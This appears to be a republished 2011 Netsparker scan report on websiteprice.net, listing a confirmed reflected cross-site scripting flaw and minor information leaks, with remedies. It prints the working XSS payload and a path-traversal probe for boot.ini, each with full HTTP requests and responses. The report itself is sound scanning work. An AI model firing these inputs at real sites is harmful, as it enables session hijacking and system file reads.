Netsparker, Web Application Security Scanner

websiteprice.net, XSS, GHDB DORK REPORT SUMMARY

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

Loading

Netsparker - Scan Report Summary
TARGET URL
http://websiteprice.net/result/?id=65934
SCAN DATE
5/2/2011 2:09:00 AM
REPORT DATE
5/2/2011 12:13:12 PM
SCAN DURATION
00:28:58

Total Requests

967

Average Speed

0.56 req/sec.
8
identified
5
confirmed
0
critical
4
informational

DORK TESTS

DORK TESTS
PROFILE
Previous Settings
ENABLED ENGINES
Static Tests, Find Backup Files, Blind Command Injection, Blind SQL Injection, Boolean SQL Injection, Command Injection, HTTP Header Injection, Local File Inclusion, Open Redirection, Remote Code Evaluation, Remote File Inclusion, SQL Injection, Cross-site Scripting
Authentication
Scheduled

VULNERABILITIES

Vulnerabilities
Netsparker - Web Application Security Scanner
IMPORTANT
13 %
LOW
38 %
INFORMATION
50 %

VULNERABILITY SUMMARY

Vulnerability Summary
URL Parameter Method Vulnerability Confirmed
/ url GET Cross-site Scripting Yes
/calculate/ url GET Programming Error Message No
/calculate/engine.asp Internal Server Error Yes
Cookie Not Marked As HttpOnly Yes
/images/ Forbidden Resource Yes
[Possible] Internal Path Leakage (Windows) No
/robots.txt IIS Version Disclosure No
Robots.txt Identified Yes
Cross-site Scripting

Cross-site Scripting

1 TOTAL
IMPORTANT
CONFIRMED
1
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser.

XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' session, an attacker might attack an administrator to gain full control over the application.

Impact

There are many different attacks that can be leveraged through the use of XSS, including:
  • Hi-jacking users' active session
  • Changing the look of the page within the victims browser.
  • Mounting a successful phishing attack.
  • Intercept data and perform man-in-the-middle attacks.

Remedy

The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML ensure that all active content is removed prior to its presentation to the server.

Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list needs only be defined once and should be used to sanitize and validate all subsequent input.

There are a number of pre-defined, well structured white-list libraries available for many different environments, good examples of these include, OWASP Reform and Microsoft Anti Cross-site Scripting libraries are good examples.

Remedy References

External References

- /

/ CONFIRMED

http://websiteprice.net/?error=1&url='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00008C)%3..

Parameters

Parameter Type Value
error GET 1
url GET '"--></style></script><script>alert(0x00008C)</script>

Request

GET /?error=1&url='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00008C)%3C/script%3E HTTP/1.1
Referer: http://websiteprice.net/calculate/?url=bollywoodswimsuit.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: websiteprice.net
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html
Content-Encoding:
Expires: Mon, 02 May 2011 02:28:16 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 02:29:38 GMT
Content-Length: 2947


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Website Price Calculator</title>
<meta name="description" content="Free online tool for valuation of any website. Website appraisal." />
<meta name="keywords" content="Website appraisal, website valuation" />
<meta name="verify-v1" content="VTcwlnBCcD/mB+0WfFgG1Id/wmTOrbS7HPtUDTUTMZk=" >
<link href="style.css" rel="stylesheet" type="text/css" />
<link rel="shortcut icon" href="/favicon.ico" />
</head>

<body>
<div id="topNav">
<a href="./"><img src="images/logo.png" alt="Website Price" border="0" /></a>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
</div>

<div id="body">
<div id="topShadow"></div>
<div id="bodyPannel">
<div style=" padding:0px 0px 10px 100px;"><!-- Begin BidVertiser code -->
<SCRIPT LANGUAGE="JavaScript1.1" SRC="http://bdv.bidvertiser.com/BidVertiser.dbm?pid=349166&bid=862453" type="text/javascript"></SCRIPT>
<noscript><a href="http://www.bidvertiser.com">internet marketing</a></noscript>
<!-- End BidVertiser code --> </div>


<div id="colorBg">

How much is your <strong>website worth</strong>? Evaluate any website for free with <strong>Website Value Calculator</strong>. This tool is only for Top Level Domains. Do not include subdomain, directory or inner page of website. The information is offered as reference only.

<br /><br />

<div id="url">

<span class="ctop"></span>
<form method="get" action="calculate/" class="contact">


<div style='width:100%;text-align:center;color:#CC0000;'>The URL is not valid and cannot be loaded.</div>
<span class="url_text">URL: </span>
<input name="url" type="text" value="http://'"--></style></script><script>netsparker(0x00008C)</script>" />
<br class="spacer" />
<button type="submit">Submit</button>
</form>
<br class="spacer" />
<span class="cbottom">&nbsp;</span>
</div>

</div>



<div class="lastbox">
<br />&nbsp;<br />&nbsp;
Last Website Value Reports:
<br />&nbsp;
<div class='front_thumb'><a href='calculate/?url=bollywoodswimsuit.com'><img src='thumb/?url_pic=bollywoodswimsuit.com' alt='bollywoodswimsuit.com' width='120' height='90' /></a><br />bollywoodswimsu...<br />$12.258</div><div class='front_thumb'><a href='calculate/?url=bollywoodswimsuit.com'><img src='thumb/?url_pic=bollywoodswimsuit.com' alt='bollywoodswimsuit.com' width='120' height='90' /></a><br />bollywoodswimsu...<br />$12.258</div><div class='front_thumb'><a href='calculate/?url=www.ebay.com'><img src='thumb/?url_pic=www.ebay.com' alt='www.ebay.com' width='120' height='90' /></a><br />www.ebay.com<br />$133 Million</div><div class='front_thumb'><a href='calculate/?url=www.no14u.bz'><img src='thumb/?url_pic=www.no14u.bz' alt='www.no14u.bz' width='120' height='90' /></a><br />www.no14u.bz<br />$3.304</div><div class='front_thumb'><a href='calculate/?url=forexnirvana.com'><img src='thumb/?url_pic=forexnirvana.com' alt='forexnirvana.com' width='120' height='90' /></a><br />forexnirvana.co...<br />$11.869</div><div class='front_thumb'><a href='calculate/?url=www.howtoimprovecommunicationskills.net'><img src='thumb/?url_pic=www.howtoimprovecommunicationskills.net' alt='www.howtoimprovecommunicationskills.net' width='120' height='90' /></a><br />www.howtoimprov...<br />-</div><div class='front_thumb'><a href='calculate/?url=www.austininsuranceguy.com'><img src='thumb/?url_pic=www.austininsuranceguy.com' alt='www.austininsuranceguy.com' width='120' height='90' /></a><br />www.austininsur...<br />-</div><div class='front_thumb'><a href='calculate/?url=www.no14u.bz'><img src='thumb/?url_pic=www.no14u.bz' alt='www.no14u.bz' width='120' height='90' /></a><br />www.no14u.bz<br />$3.304</div><div class='front_thumb'><a href='calculate/?url=www.gaychatsites.org'><img src='thumb/?url_pic=www.gaychatsites.org' alt='www.gaychatsites.org' width='120' height='90' /></a><br />www.gaychatsite...<br />$320</div><div class='front_thumb'><a href='calculate/?url=williger.com'><img src='thumb/?url_pic=williger.com' alt='williger.com' width='120' height='90' /></a><br />williger.com<br />$647</div><div class='front_thumb'><a href='calculate/?url=DUJUGAAD.COM'><img src='thumb/?url_pic=DUJUGAAD.COM' alt='DUJUGAAD.COM' width='120' height='90' /></a><br />DUJUGAAD.COM<br />$199</div><div class='front_thumb'><a href='calculate/?url=www.febadesign.com'><img src='thumb/?url_pic=www.febadesign.com' alt='www.febadesign.com' width='120' height='90' /></a><br />www.febadesign....<br />$148</div>
</div>
<div class="lastsidebar" align="center">
<!-- Begin: adBrite, Generated: 2010-10-28 10:55:36 -->
<script type="text/javascript">
var AdBrite_Title_Color = '0000FF';
var AdBrite_Text_Color = '000000';
var AdBrite_Background_Color = 'fcfaf3';
var AdBrite_Border_Color = 'fcfaf3';
var AdBrite_URL_Color = '008000';
try{var AdBrite_Iframe=window.top!=window.self?2:1;var AdBrite_Referrer=document.referrer==''?document.location:document.referrer;AdBrite_Referrer=encodeURIComponent(AdBrite_Referrer);}catch(e){var AdBrite_Iframe='';var AdBrite_Referrer='';}
</script>
<script type="text/javascript">document.write(String.fromCharCode(60,83,67,82,73,80,84));document.write(' src="http://ads.adbrite.com/mb/text_group.php?sid=1794248&zs=3330305f323530&ifr='+AdBrite_Iframe+'&ref='+AdBrite_Referrer+'" type="text/javascript">');document.write(String.fromCharCode(60,47,83,67,82,73,80,84,62));</script>
<div><a target="_top" href="http://www.adbrite.com/mb/commerce/purchase_form.php?opid=1794248&afsid=1" style="font-weight:bold;font-family:Arial;font-size:13px;">Your Ad Here</a></div>
<!-- End: adBrite -->

</div>
<div class="lastsidebar2"><div style="padding-bottom:20px;">Links:</div><ul id="lista">
<li><a href="http://cityinfosearch.net/">City Search Info</a></li>
<li><a href="http://video-hned.cz">Music video clips</a></li>
<li><a href="http://videa-klipy.cz">Funny videos</a></li>
<li><a href="http://buildstate.net">Online webgame</a></li>
<li><a href="http://superstarshop.cz/index.php?setlang=en">CD, DVD, Blu-ray online shop</a></li>
</ul>
</div>

<div class="lastsidebar2"><div style="padding-bottom:20px;">Reports:</div><ul id="lista"><li><a href='calculate/?url=bollywoodswimsuit.com'>bollywoodswimsuit.com</a> - $12.258</li><li><a href='calculate/?url=bollywoodswimsuit.com'>bollywoodswimsuit.com</a> - $12.258</li><li><a href='calculate/?url=bollywoodswimsuit.com'>bollywoodswimsuit.com</a> - $12.258</li><li><a href='calculate/?url=bollywoodswimsuit.com'>bollywoodswimsuit.com</a> - $12.258</li><li><a href='calculate/?url=bollywoodswimsuit.com'>bollywoodswimsuit.com</a> - $12.258</li><li><a href='calculate/?url=bollywoodswimsuit.com'>bollywoodswimsuit.com</a> - $12.258</li><li><a href='calculate/?url=bollywoodswimsuit.com'>bollywoodswimsuit.com</a> - $12.258</li><li><a href='calculate/?url=bollywoodswimsuit.com'>bollywoodswimsuit.com</a> - $12.258</li><li><a href='calculate/?url=bollywoodswimsuit.com'>bollywoodswimsuit.com</a> - $12.258</li><li><a href='calculate/?url=bollywoodswimsuit.com'>bollywoodswimsuit.com</a> - $12.258</li><li><a href='calculate/?url=bollywoodswimsuit.com'>bollywoodswimsuit.com</a> - $12.258</li><li><a href='calculate/?url=bollywoodswimsuit.com'>bollywoodswimsuit.com</a> - $12.258</li><li><a href='calculate/?url=bollywoodswimsuit.com'>bollywoodswimsuit.com</a> - $12.258</li><li><a href='calculate/?url=meetreen.com'>meetreen.com</a> - -</li></ul></div>

</div>
<div id="bottomShadow"></div><br class="spacer" />
</div>

<script type="text/javascript">
var infolink_pid = 146807;
var infolink_wsid = 0;
</script>
<script type="text/javascript" src="http://resources.infolinks.com/js/infolinks_main.js"></script>

<div id="footer">

<br /><br />© Copyright 2008-2010 <a href="http://websiteprice.net">WebsitePrice.net</a>.&nbsp;This site uses <a href="http://www.thumbshots.com" target="_blank" title="This site uses Thumbshots previews" rel="nofollow">Thumbshots previews</a>.&nbsp;<a href="http://privacypolicy.cz" title="Informace o ochraně osobních údajů" rel="nofollow">PrivacyPolicy.cz</a>

</div>

</body>
</html>
Internal Server Error

Internal Server Error

1 TOTAL
LOW
CONFIRMED
1
The Server responded with an HTTP status 500. This indicates that there is a server-side error. Reasons may vary. The behavior should be analysed carefully. If Netsparker is able to find a security issue in the same resource it will report this as a separate vulnerability.

Impact

The impact may vary depending on the condition. Generally this indicates poor coding practices, not enough error checking, sanitization and whitelisting. However there might be a bigger issue such as SQL Injection. If that's the case Netsparker will check for other possible issues and report them separately.

Remedy

Analyse this issue and review the application code in order to handle unexpected errors, this should be a generic practice which does not disclose further information upon an error. All errors should be handled server side only.
- /calculate/engine.asp

/calculate/engine.asp CONFIRMED

http://websiteprice.net/calculate/engine.asp

Request

GET /calculate/engine.asp HTTP/1.1
Referer: http://websiteprice.net/calculate/?url=../../../../../../../../../../boot.ini
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: websiteprice.net
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Length: 276
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDACARBDRS=PIOJBAOCPHEJBAEPHAOFCIIC; path=/
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 02:37:18 GMT


<font face="Arial" size=2><p>Microsoft VBScript runtime </font> <font face="Arial" size=2>error '800a000d'</font><p><font face="Arial" size=2>Type mismatch: 'CInt'</font><p><font face="Arial" size=2>/calculate/engine.asp</font><font face="Arial" size=2>, line 14</font>
Cookie Not Marked As HttpOnly

Cookie Not Marked As HttpOnly

1 TOTAL
LOW
CONFIRMED
1
Cookie was not marked as HTTPOnly. HTTPOnly cookies can not be read by client-side scripts therefore marking a cookie as HTTPOnly can provide an additional layer of protection against Cross-site Scripting attacks..

Impact

During a Cross-site Scripting attack an attacker might easily access cookies and hijack the victim's session.

Actions to Take

  1. See the remedy for solution
  2. Consider marking all of the cookies used by the application as HTTPOnly (After these changes javascript code will not able to read cookies.

Remedy

Mark the cookie as HTTPOnly. This will be an extra layer of defence against XSS. However this is not a silver bullet and will not protect the system against Cross-site Scripting attacks. An attacker can use a tool such as XSS Tunnel to bypass HTTPOnly protection.

External References

- /calculate/engine.asp

/calculate/engine.asp CONFIRMED

http://websiteprice.net/calculate/engine.asp

Identified Cookie

ASPSESSIONIDACARBDRS

Request

GET /calculate/engine.asp HTTP/1.1
Referer: http://websiteprice.net/calculate/?url=../../../../../../../../../../boot.ini
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: websiteprice.net
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Length: 276
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDACARBDRS=PIOJBAOCPHEJBAEPHAOFCIIC; path=/
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 02:37:18 GMT


<font face="Arial" size=2><p>Microsoft VBScript runtime </font> <font face="Arial" size=2>error '800a000d'</font><p><font face="Arial" size=2>Type mismatch: 'CInt'</font><p><font face="Arial" size=2>/calculate/engine.asp</font><font face="Arial" size=2>, line 14</font>
Programming Error Message

Programming Error Message

1 TOTAL
LOW
Netsparker identified a programming error message.

Impact

The error message may disclose sensitive information and this information can be used by an attacker to mount new attacks or to enlarge the attack surface. Source code, stack trace, etc. type data may be disclosed. Most of these issues will be identified and reported separately by Netsparker.

Remedy

Do not provide error messages on production environments. Save error messages with a reference number to a backend storage such as a log, text file or database then show this number and a static user-friendly error message to the user.
- /calculate/

/calculate/

http://websiteprice.net/calculate/?url=../../../../../../../../../../boot.ini

Parameters

Parameter Type Value
url GET ../../../../../../../../../../boot.ini

Identified Error Message

Microsoft VBScript runtime </font> <font face="Arial" size=2>error '800a000d'</font>

Request

GET /calculate/?url=../../../../../../../../../../boot.ini HTTP/1.1
Referer: http://websiteprice.net/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: websiteprice.net
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Transfer-Encoding: chunked
Content-Type: text/html
Content-Encoding:
Expires: Mon, 02 May 2011 02:17:16 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 02:18:16 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Website Price</title>
<link href="../style.css" rel="stylesheet" type="text/css" />
<link rel="shortcut icon" href="../favicon.ico" />
</head>

<body>

<div id="topNav"><a href="../"><img src="../images/logo.png" alt="Website Price" border="0" /></a></div>

<div id="body">

<div id="topShadow"></div>

<div id="bodyPannel">

<div class="wait">
<strong>Calculate price of "&nbsp;&nbsp;"</strong><br /><br />
<img src="../images/wait.gif" alt="Wait please..." /><br /><br />
Please be patient - this may take several minutes.
</div>

</div>

<div id="bottomShadow"></div><br class="spacer" /></div>

<div id="footer">© Copyright 2009-2010 <a href="http://www.websiteprice.net">WebsitePrice.net</a></div>

<font face="Arial" size=2><p>Microsoft VBScript runtime </font> <font face="Arial" size=2>error '800a000d'</font><p><font face="Arial" size=2>Type mismatch: 'CInt'</font><p><font face="Arial" size=2>/calculate/engine.asp</font><font face="Arial" size=2>, line 14</font>
Forbidden Resource

Forbidden Resource

1 TOTAL
INFORMATION
CONFIRMED
1
Access to this resource has been denied by the web server. This is generally not a security issue, and is reported here for information purposes.

Impact

There is no impact resulting from this issue.
- /images/

/images/ CONFIRMED

http://websiteprice.net/images/

Request

GET /images/ HTTP/1.1
Referer: http://websiteprice.net/images/logo.png
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: websiteprice.net
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 403 Forbidden
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 02:09:04 GMT
Content-Length: 5408


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 7.0 Detailed Error - 403.14 - Forbidden</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;background:#CBE1EF;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre{margin:0;font-size:1.4em;word-wrap:break-word;} ul,ol{margin:10px 0 10px 40px;} ul.first,ol.first{margin-top:5px;} fieldset{padding:0 15px 10px 15px;} .summary-container fieldset{padding-bottom:5px;margin-top:4px;} legend.no-expand-all{padding:2px 15px 4px 10px;margin:0 0 0 -12px;} legend{color:#333333;padding:4px 15px 4px 10px;margin:4px 0 8px -12px;_margin-top:0px; border-top:1px solid #EDEDED;border-left:1px solid #EDEDED;border-right:1px solid #969696; border-bottom:1px solid #969696;background:#E7ECF0;font-weight:bold;font-size:1em;} a:link,a:visited{color:#007EFF;font-weight:bold;} a:hover{text-decoration:none;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.4em;margin:10px 0 0 0;color:#CC0000;} h4{font-size:1.2em;margin:10px 0 5px 0; }#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS",Verdana,sans-serif; color:#FFF;background-color:#5C87B2; }#content{margin:0 0 0 2%;position:relative;} .summary-container,.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} .config_source{background:#fff5c4;} .content-container p{margin:0 0 10px 0; }#details-left{width:35%;float:left;margin-right:2%; }#details-right{width:63%;float:left; }#server_version{width:96%;_height:1px;min-height:1px;margin:0 0 5px 0;padding:11px 2% 8px 2%;color:#FFFFFF; background-color:#5A7FA5;border-bottom:1px solid #C1CFDD;border-top:1px solid #4A6C8E;font-weight:normal; font-size:1em;color:#FFF;text-align:right; }#server_version p{margin:5px 0;} table{margin:4px 0 4px 0;width:100%;border:none;} td,th{vertical-align:top;padding:3px 0;text-align:left;font-weight:bold;border:none;} th{width:30%;text-align:right;padding-right:2%;font-weight:normal;} thead th{background-color:#ebebeb;width:25%; }#details-right th{width:20%;} table tr.alt td,table tr.alt th{background-color:#ebebeb;} .highlight-code{color:#CC0000;font-weight:bold;font-style:italic;} .clear{clear:both;} .preferred{padding:0 5px 2px 5px;font-weight:normal;background:#006633;color:#FFF;font-size:.8em;} --> </style> </head> <body> <div id="header"><h1>Server Error in Application "WEBSITEPRICE.NET"</h1></div> <div id="server_version"><p>Internet Information Services 7.0</p></div> <div id="content"> <div class="content-container"> <fieldset><legend>Error Summary</legend> <h2>HTTP Error 403.14 - Forbidden</h2> <h3>The Web server is configured to not list the contents of this directory.</h3> </fieldset> </div> <div class="content-container"> <fieldset><legend>Detailed Error Information</legend> <div id="details-left"> <table border="0" cellpadding="0" cellspacing="0"> <tr class="alt"><th>Module</th><td>DirectoryListingModule</td></tr> <tr><th>Notification</th><td>ExecuteRequestHandler</td></tr> <tr class="alt"><th>Handler</th><td>StaticFile</td></tr> <tr><th>Error Code</th><td>0x00000000</td></tr> </table> </div> <div id="details-right"> <table border="0" cellpadding="0" cellspacing="0"> <tr class="alt"><th>Requested URL</th><td>http://websiteprice.net:80/images/</td></tr> <tr><th>Physical Path</th><td>D:\Hosting\5132054\html\images\</td></tr> <tr class="alt"><th>Logon Method</th><td>Anonymous</td></tr> <tr><th>Logon User</th><td>Anonymous</td></tr> </table> <div class="clear"></div> </div> </fieldset> </div> <div class="content-container"> <fieldset><legend>Most likely causes:</legend> <ul> <li>A default document is not configured for the requested URL, and directory browsing is not enabled on the server.</li> </ul> </fieldset> </div> <div class="content-container"> <fieldset><legend>Things you can try:</legend> <ul> <li>If you do not want to enable directory browsing, ensure that a default document is configured and that the file exists.</li> <li> Enable directory browsing using IIS Manager. <ol> <li>Open IIS Manager.</li> <li>In the Features view, double-click Directory Browsing.</li> <li>On the Directory Browsing page, in the Actions pane, click Enable.</li> </ol> </li> <li>Verify that the configuration/system.webServer/directoryBrowse@enabled attribute is set to true in the site or application configuration file.</li> </ul> </fieldset> </div> <div class="content-container"> <fieldset><legend>Links and More Information</legend> This error occurs when a document is not specified in the URL, no default document is specified for the Web site or application, and directory listing is not enabled for the Web site or application. This setting may be disabled on purpose to secure the contents of the server. <p><a href="http://go.microsoft.com/fwlink/?LinkID=62293&amp;IIS70Error=403,14,0x00000000,6002">View more information &raquo;</a></p> </fieldset> </div> </div> </body> </html>
IIS Version Disclosure

IIS Version Disclosure

1 TOTAL
INFORMATION
Netsparker identified that the target web server is disclosing the web server's version in the HTTP response. This information can help an attacker to gain a greater understanding of the system in use and potentially develop further attacks targeted at the specific web server version.

Impact

An attacker can look for specific security vulnerabilities for the version identified through the SERVER header information.

Remediation

Configure your web server to prevent information leakage from the SERVER header of its HTTP response.
- /robots.txt

/robots.txt

http://websiteprice.net/robots.txt

Extracted Version

Microsoft-IIS/7.0

Request

GET /robots.txt HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: websiteprice.net
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Content-Encoding:
Last-Modified: Thu, 22 Oct 2009 09:06:37 GMT
Accept-Ranges: bytes
ETag: "4004f6f652ca1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 02:09:00 GMT
Content-Length: 141


User-agent: *
Disallow:
Robots.txt Identified

Robots.txt Identified

1 TOTAL
INFORMATION
CONFIRMED
1
Netsparker identified a possibly sensitive Robots.txt file with potentially sensitive content.

Impact

Depending on the content of the file, an attacker might discover hidden directories. Ensure that you have got nothing sensitive exposed within this folder such as the path of the administration panel.

Remedy

  • If disallowed paths are sensitive, do not write them in the robots.txt and ensure that they correctly protected by means of authentication.
- /robots.txt

/robots.txt CONFIRMED

http://websiteprice.net/robots.txt

Interesting Robots.txt Entries

  • Disallow:

Request

GET /robots.txt HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: websiteprice.net
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Content-Encoding:
Last-Modified: Thu, 22 Oct 2009 09:06:37 GMT
Accept-Ranges: bytes
ETag: "4004f6f652ca1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 02:09:00 GMT
Content-Length: 141


User-agent: *
Disallow:
[Possible] Internal Path Leakage (Windows)

[Possible] Internal Path Leakage (Windows)

1 TOTAL
INFORMATION
Netsparker identified an internal path in the document.

Impact

There is no direct impact however this information can help an attacker either to identify other vulnerabilities or during the exploitation of other identified vulnerabilities.

Remedy

First ensure that this is not a false positive. Due to the nature of the issue. Netsparker could not confirm that this file path was actually the real file path of the target web server.
  • Error messages should be disabled.
  • Remove this kind of sensitive data from the output.

External References

- /images/

/images/

http://websiteprice.net/images/

Identified Internal Path(s)

D:\Hosting\5132054\html\images\

Request

GET /images/ HTTP/1.1
Referer: http://websiteprice.net/images/logo.png
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: websiteprice.net
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 403 Forbidden
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 02:09:04 GMT
Content-Length: 5408


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 7.0 Detailed Error - 403.14 - Forbidden</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;background:#CBE1EF;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre{margin:0;font-size:1.4em;word-wrap:break-word;} ul,ol{margin:10px 0 10px 40px;} ul.first,ol.first{margin-top:5px;} fieldset{padding:0 15px 10px 15px;} .summary-container fieldset{padding-bottom:5px;margin-top:4px;} legend.no-expand-all{padding:2px 15px 4px 10px;margin:0 0 0 -12px;} legend{color:#333333;padding:4px 15px 4px 10px;margin:4px 0 8px -12px;_margin-top:0px; border-top:1px solid #EDEDED;border-left:1px solid #EDEDED;border-right:1px solid #969696; border-bottom:1px solid #969696;background:#E7ECF0;font-weight:bold;font-size:1em;} a:link,a:visited{color:#007EFF;font-weight:bold;} a:hover{text-decoration:none;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.4em;margin:10px 0 0 0;color:#CC0000;} h4{font-size:1.2em;margin:10px 0 5px 0; }#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS",Verdana,sans-serif; color:#FFF;background-color:#5C87B2; }#content{margin:0 0 0 2%;position:relative;} .summary-container,.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} .config_source{background:#fff5c4;} .content-container p{margin:0 0 10px 0; }#details-left{width:35%;float:left;margin-right:2%; }#details-right{width:63%;float:left; }#server_version{width:96%;_height:1px;min-height:1px;margin:0 0 5px 0;padding:11px 2% 8px 2%;color:#FFFFFF; background-color:#5A7FA5;border-bottom:1px solid #C1CFDD;border-top:1px solid #4A6C8E;font-weight:normal; font-size:1em;color:#FFF;text-align:right; }#server_version p{margin:5px 0;} table{margin:4px 0 4px 0;width:100%;border:none;} td,th{vertical-align:top;padding:3px 0;text-align:left;font-weight:bold;border:none;} th{width:30%;text-align:right;padding-right:2%;font-weight:normal;} thead th{background-color:#ebebeb;width:25%; }#details-right th{width:20%;} table tr.alt td,table tr.alt th{background-color:#ebebeb;} .highlight-code{color:#CC0000;font-weight:bold;font-style:italic;} .clear{clear:both;} .preferred{padding:0 5px 2px 5px;font-weight:normal;background:#006633;color:#FFF;font-size:.8em;} --> </style> </head> <body> <div id="header"><h1>Server Error in Application "WEBSITEPRICE.NET"</h1></div> <div id="server_version"><p>Internet Information Services 7.0</p></div> <div id="content"> <div class="content-container"> <fieldset><legend>Error Summary</legend> <h2>HTTP Error 403.14 - Forbidden</h2> <h3>The Web server is configured to not list the contents of this directory.</h3> </fieldset> </div> <div class="content-container"> <fieldset><legend>Detailed Error Information</legend> <div id="details-left"> <table border="0" cellpadding="0" cellspacing="0"> <tr class="alt"><th>Module</th><td>DirectoryListingModule</td></tr> <tr><th>Notification</th><td>ExecuteRequestHandler</td></tr> <tr class="alt"><th>Handler</th><td>StaticFile</td></tr> <tr><th>Error Code</th><td>0x00000000</td></tr> </table> </div> <div id="details-right"> <table border="0" cellpadding="0" cellspacing="0"> <tr class="alt"><th>Requested URL</th><td>http://websiteprice.net:80/images/</td></tr> <tr><th>Physical Path</th><td>D:\Hosting\5132054\html\images\</td></tr> <tr class="alt"><th>Logon Method</th><td>Anonymous</td></tr> <tr><th>Logon User</th><td>Anonymous</td></tr> </table> <div class="clear"></div> </div> </fieldset> </div> <div class="content-container"> <fieldset><legend>Most likely causes:</legend> <ul> <li>A default document is not configured for the requested URL, and directory browsing is not enabled on the server.</li> </ul> </fieldset> </div> <div class="content-container"> <fieldset><legend>Things you can try:</legend> <ul> <li>If you do not want to enable directory browsing, ensure that a default document is configured and that the file exists.</li> 